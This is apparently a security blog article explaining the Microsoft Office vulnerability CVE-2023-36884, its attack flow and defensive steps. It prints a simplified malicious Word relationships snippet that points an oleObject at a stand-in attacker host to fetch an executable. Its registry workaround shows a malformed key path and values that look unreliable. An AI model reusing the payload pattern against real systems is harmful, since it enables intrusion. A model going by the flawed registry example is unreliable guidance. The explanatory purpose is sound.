CVE-2023-36884 - Breaking Down the Latest Microsoft Office Remote Code Execution Vulnerability

Microsoft products like Windows and Office touch the lives of millions worldwide, both at home and in the workplace. When security issues emerge, they can put our files, privacy, and work at risk. One such recent threat is CVE-2023-36884—a serious remote code execution vulnerability affecting Microsoft Windows and multiple Office products. In this exclusive long read, we’ll break down what this vulnerability is, how attackers try to exploit it using malicious Office files, and what you can do to stay safe.

What is CVE-2023-36884?

CVE-2023-36884 is a vulnerability that allows remote code execution (RCE), meaning an attacker can run malicious code on your computer if they can get you to open a specially-crafted Microsoft Office document (such as a Word, Excel, or PowerPoint file). Microsoft has confirmed that attackers are already trying to exploit this issue in the wild.

The Attacker Creates a Booby-Trapped Document

A cybercriminal designs a document (often a Word file) containing hidden, malicious content.

Victim is Lured In

The attacker sends the file—typically through email, cloud links, or other sharing methods—hoping you will open it.

Malicious Code Executes

If you open the file, the exploit is triggered. The attacker’s code runs on your system, possibly giving them control of your computer or allowing them to steal sensitive information.

Microsoft’s investigation is ongoing. Depending on findings, they may issue a security update as part of routine Patch Tuesday releases or provide an urgent, out-of-cycle patch if the risk is high.

Why is CVE-2023-36884 Dangerous?

- No Special Access Needed: The attacker doesn’t need a password or special permissions—just your curiosity to open a document.

Already Being Used in Targeted Attacks: This vulnerability is being exploited in the real world.

- Affects Multiple Products: Not just one app—many Office programs (Word, Excel, PowerPoint) and Windows versions may be affected.

How Does the Attack Work?

The attack relies on how Microsoft Office handles specific document data. While Microsoft hasn’t released the precise technical details (to prevent easy reproduction by hackers), security researchers have observed that exploits involve Office document template injection and remote code payloads.

A simplified example using a malicious Word document might look like this

<!-- Malicious Word document's XML relationships snippet -->
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">;
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject";
    Target="http://attacker-site.com/malicious.exe"/>;
</Relationships>

When an unsuspecting user opens this document, Word tries to fetch and execute the code from attacker-site.com.

1. Stay Skeptical of Document Attachments

Never open Office documents from unknown senders or suspicious emails.

2. Use Protected View in Office

Office’s Protected View opens files in a restricted environment. Don’t click “Enable Editing” unless you’re sure the document is safe.

3. Apply Microsoft’s Workaround

As Microsoft suggests in their Threat Intelligence blog post, you can temporarily block certain file extensions or add Registry keys to reduce risk. Here’s a basic example to prevent certain OLE objects from loading:

Registry Change Example

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\15.\Word\Security\FileBlock]
"Word2007Files"=dword:00000002
"Word2003Files"=dword:00000002

Apply only as directed by Microsoft or your IT team—modifying registry entries can cause programs to behave unexpectedly if not done correctly.

4. Keep Software Up-to-Date

Install all security patches as soon as they're available. Microsoft will update CVE-2023-36884's official page and the Storm-0978 Threat Intelligence entry as new information comes out.

5. Enable Microsoft Defender or Your Antivirus

Modern versions of Microsoft Defender can detect and block some exploit attempts automatically.

Where to Find More Information

- Official Microsoft Security Update Guide: CVE-2023-36884
- Microsoft Threat Intelligence Blog – Initial Discovery and Guidance
- Microsoft Support: Social Engineering Protection

Conclusion

CVE-2023-36884 highlights how attackers continue to use seemingly-innocent files to get into our systems. Simple precautions alongside careful patching and keeping an eye on Microsoft’s recommendations go a long way. Stay alert: as more details come out and updates are released, take action to keep your systems safe.

Bookmark this article and the Microsoft links above. We’ll update our guidance as new developments arrive.

Stay safe, and spread awareness to your colleagues and friends.

Timeline

Published on: 07/11/2023 19:15:00 UTC
Last modified on: 07/12/2023 12:46:00 UTC